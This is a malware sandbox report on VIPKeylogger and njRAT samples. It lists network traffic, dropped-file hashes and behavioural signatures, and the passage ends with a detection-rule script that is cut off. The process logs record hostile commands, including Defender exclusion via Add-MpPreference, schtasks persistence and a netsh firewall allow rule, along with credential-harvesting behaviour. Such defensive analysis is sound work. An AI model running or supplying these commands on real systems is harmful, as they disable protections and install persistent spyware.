| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| DE | 46.3.197.86:80 | | tcp |
| DE | 46.3.197.86:80 | | tcp |
| DE | 46.3.197.86:80 | | tcp |
| DE | 46.3.197.86:80 | | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.180.3:80 | c.pki.goog | tcp |
| DE | 46.3.197.86:80 | | tcp |
| DE | 46.3.197.86:80 | | tcp |
| DE | 46.3.197.86:80 | | tcp |
| DE | 46.3.197.86:80 | | tcp |
| DE | 46.3.197.86:80 | | tcp |
| DE | 46.3.197.86:80 | | tcp |
| DE | 46.3.197.86:80 | | tcp |
| DE | 46.3.197.86:80 | | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\RCX54A9.tmp
| MD5 | 192f0f1221e376146e725a4d23ee69a0 |
| SHA1 | 9500b9672eac1b1b2dee0e81f8b8efbb6d0d90ff |
| SHA256 | 019443010d028a6d5828afc530b1bd568e536afe32e715fe6a771f3ee1a3cc9d |
| SHA512 | daab36e062d27fd7a62607eb16a6013523fafabb31618e681feeae2fc92eb93d43c1f1a8051849aee4839d8b025ccf7227f5081847fd7b2c78e6f233f8d25a54 |
C:\Users\Default\Documents\sysmon.exe
| MD5 | 580e5064ca4b779d1d09219a657b7d50 |
| SHA1 | 4f8ea6b2f6a4a6d7b8557a5f77278bbf6b8f7161 |
| SHA256 | 2a6b133585b2961795c3cbb04a618a8686fee464bb3419e337140f9ded074dff |
| SHA512 | 85c088a2263d6341adf1837beb64e5369482c27cd1108e7f7637a4cf3d206c817bfa6f1ed1cfdaca4f3e8f612202125c63981debe2ac0f1052d1b16dd2023e77 |
C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe
| MD5 | b7894080a21eb5a3bce7689afbb0522f |
| SHA1 | e4b1e9b8c5457b36927b850a1efd2a13c47357de |
| SHA256 | a639a90c71371f8ea6c9caf3a8f8ac932bd5e94ebbd8a94ba80bb7646862130b |
| SHA512 | dbd9c611da30593733a8cf7a030c0a56a53b1050811cdfd22d0a2d5754b9212a3a09994e12617e9918b7e08784dbc4105bdacf67cec7ef7d96f3b4f56db79f3e |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rg2ywzog.5go.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4028-138-0x00000219EDF90000-0x00000219EDFB2000-memory.dmp
memory/4424-186-0x00000000003C0000-0x00000000005AA000-memory.dmp
memory/2832-187-0x00007FFD48580000-0x00007FFD49041000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 084d49c16a0db5a169356315e8e97d83 |
| SHA1 | af662c8666ef7c52c9711c0f143e0b8620f27d19 |
| SHA256 | a374d799d8b4b9c2cac922c093a90cbaf6d0bda3155faf176c6f95b46b8f35d2 |
| SHA512 | c14524f55f0e58bb64a99298b82d995136a0057c2a7e4e972b9c90477871ae416063318ba8b7f43a4fc66ca8b21eca26505645c4d195fe3ab9419c8d35a459fb |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ffb4808be0aaa918b807bb4dd4f5e080 |
| SHA1 | 8895ae463a633e1201ed09468acc86e1e57a838b |
| SHA256 | 26fb93195d69045c08c9720cd9291fec8cb24fe49f5dd2604c26d6873f41c3b2 |
| SHA512 | 7370e92e6c097ee52ef4d3e3b9ccbf482bbd3603bb25355c84c4c1599c94c8d0d4edc230d7db1ab8dd4d34c40afec839187fa5db46d48c58802e9e3107414ed9 |
memory/4424-199-0x000000001CD50000-0x000000001CDA6000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 842369b08704bbddf9de4d90016e58dd |
| SHA1 | 8bc3da656c08abbc14c58201e65b0dc823964bea |
| SHA256 | cbf20404c609c0792de4320ac3fa1806269cf5d97420565e3f43d409a11a2808 |
| SHA512 | 8f6cc3419f04b1cb4e6c7986ad9fb8a43fb380fee263937e223d8a5269aec918c2c8cd362ee708de0ded3a533f4cd43624d606f45b37e128bec52ada30c43b42 |
C:\Users\Admin\AppData\Local\Temp\0b6ae157-8b64-43cb-ac10-a948f173177f.vbs
| MD5 | 93e69e1ff8482f031b35d40d2ef71303 |
| SHA1 | d77127acce0290e180676f139fcaf8335af765b2 |
| SHA256 | 9081711b1675f592ace8cdf863fc0d8ee9b611a7f0ff3844914846277f62a8d2 |
| SHA512 | 44eb6228484aeed97f6d96cc4f94e046adb2ddd129b2145fa71e1d834a8d3a6640b2b6c73af0f18da1344ebe06e22fce19524a9b3a825bf39d3e0a8addec0e23 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\RuntimeBroker.exe.log
| MD5 | 364147c1feef3565925ea5b4ac701a01 |
| SHA1 | 9a46393ac3ffad3bb3c8f0e074b65d68d75e21ef |
| SHA256 | 38cf1ab1146ad24e88763fc0508c2a99478d8428b453ba8c8b830d2883a4562b |
| SHA512 | bfec1d3f22abd5668def189259deb4d919ceb4d51ac965d0baf9b6cf8bea0db680d49a2b8d0b75524cc04c7803cdfd91e484b31dc8ddc3ff47d1e5c59a9e35cf |
C:\Users\Admin\AppData\Local\Temp\a76d9b01-68ad-4456-a1a4-00c1be7279e6.vbs
| MD5 | 70001a75882477b11b14ead821e0041c |
| SHA1 | bc61badbf3c0b0e20506b7205db00040035fcbce |
| SHA256 | 0163fece010a4d0cfd72d263786e1f7dafa903dd8bb4dcb190f88da1d7e2f2ef |
| SHA512 | 9b02297879ffb5b5c5ed99ce87d9bb4e10d18c12c0da25bc6a4d799b3e827d9274bc7d6e6bf2a10112dab6adfcca47fd1933efc9ca8a751d2b30f5a0e63d277e |
C:\Users\Admin\AppData\Local\Temp\eb7bcdea-7451-4191-97bb-7b63583916a8.vbs
| MD5 | cb9b41199d53f23bd89d4d8fd909a9db |
| SHA1 | fe7dc4654ec51deda888f6b96e5337297f9a8c69 |
| SHA256 | 848bda3d52d9c1443ec77e96eceeeabea683e8b9aa93e83c12e4e1f2a9e76e63 |
| SHA512 | 565dcf2e1d438b1e2e5a43faa4370b3d95bd24b96a8e2fc82c34fa6b12cb100e16b6871ae9ed9f3108f928ec29c95dac951fc77601f189aa40ccd7f96b91affa |
C:\Users\Admin\AppData\Local\Temp\75d8afdd-eb20-4e77-b784-b85e7f9732e7.vbs
| MD5 | ee37f0cb0dffd9aa549a48dc18ac09ec |
| SHA1 | 604645fe606098e8163aba99dda3870b3b02daa0 |
| SHA256 | 59283d2cba9109742391c88ce249e395bda4a76121e900b3a8b87f923c9203a2 |
| SHA512 | 37134845e7c5c3b49e4db2cea5b99beeb1c1fc4fd1a3d5cd5daf521833507707ec6d08e272d75048bc5224a37538824bbcd6c8b43c851a283eea74403d4053ee |
memory/1688-233-0x000000001BDF0000-0x000000001BE02000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\adae97e0-5685-40c2-a067-5084cdafa210.vbs
| MD5 | ba6115ad6f7d86261f8c6f87a007a44a |
| SHA1 | 4356173d94a391cf9d8300561864e11302b2a101 |
| SHA256 | d540ed9f50e9fae86ada2e15a683a26ff7f44289b640841c1c8b84014233cbf5 |
| SHA512 | bad9ba2c46f02281c2961f9b45bad5298c4f0e4e333f0b8f75cbf2104608b832bef3ca97fa2f83077cf2e867fdf9366ad7d551606a33f0b1ccb9e0bf97e2e1f4 |
C:\Users\Admin\AppData\Local\Temp\b0b4b5c5-dbff-4607-8e87-0383aaa9a4e4.vbs
| MD5 | 0810b2bf273f247893a309e7c28f2f77 |
| SHA1 | ce453f4c13e8c82b84d7ae489d483a6fc020844b |
| SHA256 | 1acb333b8f6649a966339896ca11f92b5b08106443a0a340e3986cb25d59ccef |
| SHA512 | e392e0dd705af82cb4dcb686036f983d98de520e57b7510f3420dd9b7f23d129c51b3a23ca75c49cf714dee3704eb5a60dc24c9a19462b09c173de7c3ef267d0 |
C:\Users\Admin\AppData\Local\Temp\6700d9fb-c70e-4df5-802b-0a60dde3a10d.vbs
| MD5 | b8739458d1e32adb250fb571d618a0e8 |
| SHA1 | aec28b21fc530f20e364f63597e282bdf7820b25 |
| SHA256 | b348155d09610b0027d2af8ced9f13d674076e6bc57e5bb8fb1170cf2d684be0 |
| SHA512 | 77ca8c26988b44941023083784b069a089c48067bdcac8c0868f331e7b3daa917e164f6ac7e2cc83492739515f895153d97289503528aec56b7eeb2926189664 |
C:\Users\Admin\AppData\Local\Temp\b2aa43f5-8e59-4c2f-a2c1-f6e1860f8773.vbs
| MD5 | b26b53442243ddf60685b746c32a0e07 |
| SHA1 | aa585329e3921ac1a530a6e9598746e6058fba09 |
| SHA256 | ccde0b0a1c225eae73a5b51ff720c1859eade7ae1bfa04a8826d8e37600c5ab5 |
| SHA512 | a49ffb4e8c216c1b91ae43b591af07d7af6d7560fde075e2ae4fdc2b58f1fa40fbaa30346b6a4d7e62eaf82a033d5430208b22540d49aaadbbefe0bafe3cbba9 |
memory/3964-278-0x000000001D240000-0x000000001D252000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\58d4f751-9ef0-4884-911e-d5bcc125af2c.vbs
| MD5 | 0a2e3215745ff4c5b946949b2fe2fbf4 |
| SHA1 | 4aea9d97e32f82ec670a9e9e02b1e20ee2f1c627 |
| SHA256 | cd3e08e48e2030fa770869ddbce520198a001e47895c79f069b1f65269606977 |
| SHA512 | 94fd68ff0f253697264141ea0039eb9e6b86940eb8f1d20c2c1c73fbe6e74baac474f7d4163eccbc90ff7b0e4f7d69909adee3aa4cfffcde3a93227d5a884ec2 |
C:\Users\Admin\AppData\Local\Temp\1789c539-d417-4967-a27b-2073ad42ae17.vbs
| MD5 | b7ecc58b7f6d397feb464dd173641da7 |
| SHA1 | a4bb906602e86f8df5d5f8efdcfbc00fc4bd1505 |
| SHA256 | 6a55cf218a931fa5c0553f356211aa3c5e61d5f9e1f4717401f22fee98d65a87 |
| SHA512 | 209b2d9aba98c6db84e41019aee110a3e0aee085ed21c40a0647c6f86a7d4a2073ef929636221569cea72aaf70f27783d3a9fe2bff71772a94ee9e2ed2c1e05d |
Analysis: behavioral10
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win10v2004-20250314-en
Max time kernel
132s
Max time network
140s
Command Line
Signatures
VIPKeylogger
Vipkeylogger family
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | N/A |
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | checkip.dyndns.org | N/A | N/A |
| N/A | reallyfreegeoip.org | N/A | N/A |
| N/A | reallyfreegeoip.org | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4580 set thread context of 5788 | N/A | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe
"C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\LbXyTV.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LbXyTV" /XML "C:\Users\Admin\AppData\Local\Temp\tmpBBBE.tmp"
C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe
"C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | checkip.dyndns.org | udp |
| US | 158.101.44.242:80 | checkip.dyndns.org | tcp |
| US | 8.8.8.8:53 | reallyfreegeoip.org | udp |
| US | 104.21.48.1:443 | reallyfreegeoip.org | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.180.3:80 | c.pki.goog | tcp |
Files
memory/4580-0-0x00000000748CE000-0x00000000748CF000-memory.dmp
memory/4580-1-0x0000000000BF0000-0x0000000000CA2000-memory.dmp
memory/4580-2-0x0000000005CA0000-0x0000000006244000-memory.dmp
memory/4580-3-0x00000000056F0000-0x0000000005782000-memory.dmp
memory/4580-4-0x00000000748C0000-0x0000000075070000-memory.dmp
memory/4580-5-0x00000000056B0000-0x00000000056BA000-memory.dmp
memory/4580-6-0x00000000069C0000-0x00000000069D0000-memory.dmp
memory/4580-7-0x00000000748CE000-0x00000000748CF000-memory.dmp
memory/4580-8-0x00000000748C0000-0x0000000075070000-memory.dmp
memory/4580-9-0x0000000006A10000-0x0000000006A9E000-memory.dmp
memory/4580-10-0x000000000A5D0000-0x000000000A66C000-memory.dmp
memory/2140-15-0x00000000748C0000-0x0000000075070000-memory.dmp
memory/2140-16-0x0000000002370000-0x00000000023A6000-memory.dmp
memory/2140-17-0x00000000748C0000-0x0000000075070000-memory.dmp
memory/2140-18-0x0000000004E60000-0x0000000005488000-memory.dmp
memory/4844-22-0x00000000053D0000-0x0000000005436000-memory.dmp
memory/2140-33-0x0000000005680000-0x00000000059D4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_foyrrmvz.av4.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\tmpBBBE.tmp
| MD5 | 74462885d88a62da553d1f1ac504321a |
| SHA1 | e51b459fdffb9b36418af5199e7ad9049abdecd3 |
| SHA256 | 0c8200e36b80511ecfc6efa6f24d5fc8ed50c8732ec08c7645e1b92c8e32446b |
| SHA512 | 96b8323bfa2d0549c355f9edd81e89717a3cc3e14f47a40e7b4a20d509dd5b983a301d3845af770eae0450f9adf7af962180919ec365022558cec214b4df6040 |
memory/4844-21-0x00000000748C0000-0x0000000075070000-memory.dmp
memory/4844-20-0x0000000005360000-0x00000000053C6000-memory.dmp
memory/4844-19-0x00000000052B0000-0x00000000052D2000-memory.dmp
memory/4844-40-0x00000000748C0000-0x0000000075070000-memory.dmp
memory/5788-44-0x0000000000400000-0x0000000000448000-memory.dmp
memory/4580-47-0x00000000748C0000-0x0000000075070000-memory.dmp
memory/4844-45-0x00000000748C0000-0x0000000075070000-memory.dmp
memory/4844-48-0x0000000006380000-0x000000000639E000-memory.dmp
memory/4844-49-0x0000000006410000-0x000000000645C000-memory.dmp
memory/4844-61-0x0000000006980000-0x000000000699E000-memory.dmp
memory/4844-51-0x0000000070F50000-0x0000000070F9C000-memory.dmp
memory/2140-63-0x0000000070F50000-0x0000000070F9C000-memory.dmp
memory/4844-62-0x0000000007570000-0x0000000007613000-memory.dmp
memory/4844-50-0x0000000006940000-0x0000000006972000-memory.dmp
memory/2140-74-0x0000000007600000-0x0000000007C7A000-memory.dmp
memory/4844-73-0x00000000076A0000-0x00000000076BA000-memory.dmp
memory/2140-75-0x0000000007030000-0x000000000703A000-memory.dmp
memory/2140-76-0x0000000007240000-0x00000000072D6000-memory.dmp
memory/2140-77-0x00000000071C0000-0x00000000071D1000-memory.dmp
memory/2140-79-0x0000000007200000-0x0000000007214000-memory.dmp
memory/4844-78-0x00000000078D0000-0x00000000078DE000-memory.dmp
memory/2140-80-0x0000000007300000-0x000000000731A000-memory.dmp
memory/4844-81-0x00000000079C0000-0x00000000079C8000-memory.dmp
memory/4844-85-0x00000000748C0000-0x0000000075070000-memory.dmp
memory/2140-84-0x00000000748C0000-0x0000000075070000-memory.dmp
memory/5788-86-0x0000000006EA0000-0x0000000007062000-memory.dmp
memory/5788-87-0x0000000006D20000-0x0000000006D70000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win10v2004-20250313-en
Max time kernel
146s
Max time network
149s
Command Line
Signatures
Njrat family
njRAT/Bladabindi
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1a9cd1714a3e518cfd51f84f1be819bf.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\confuse = "C:\\Users\\Admin\\AppData\\Roaming\\confuse\\chargeable.exe" | C:\Users\Admin\AppData\Local\Temp\1a9cd1714a3e518cfd51f84f1be819bf.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysMain = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1a9cd1714a3e518cfd51f84f1be819bf.exe" | C:\Users\Admin\AppData\Local\Temp\1a9cd1714a3e518cfd51f84f1be819bf.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 976 set thread context of 5024 | N/A | C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe | C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe |
| PID 976 set thread context of 1088 | N/A | C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe | C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe |
| PID 976 set thread context of 3016 | N/A | C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe | C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1a9cd1714a3e518cfd51f84f1be819bf.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\1a9cd1714a3e518cfd51f84f1be819bf.exe
"C:\Users\Admin\AppData\Local\Temp\1a9cd1714a3e518cfd51f84f1be819bf.exe"
C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe
"C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe"
C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe
C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe
C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe
C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe
C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe
C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 3016 -ip 3016
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1088 -ip 1088
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 80
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1088 -s 80
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe" "chargeable.exe" ENABLE
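The process lists of behavioral10 (PowerShell `Add-MpPreference -ExclusionPath` for the sample and its copy under `AppData\Roaming`, then `schtasks /Create /XML` from a temp file) and behavioral16 (`netsh firewall add allowedprogram` for the dropped `chargeable.exe`) are the three command-line shapes a detection engineer would want to match. The following is an added example, not part of the sandbox report: it classifies raw process command lines against those three shapes and grades a hit higher when the binary being excluded, scheduled or allowed lives in a user-writable location. The rule set, the user-writable path list and the two benign control lines are assumptions; the four malicious lines are copied from the tables above.

```python
import re

# Command-line rules keyed on the three shapes recorded in the process lists above:
# (Add|Set)-MpPreference exclusion and schtasks /Create /XML (behavioral10) and
# netsh firewall add allowedprogram (behavioral16).
RULES = {
    "defender_exclusion": re.compile(
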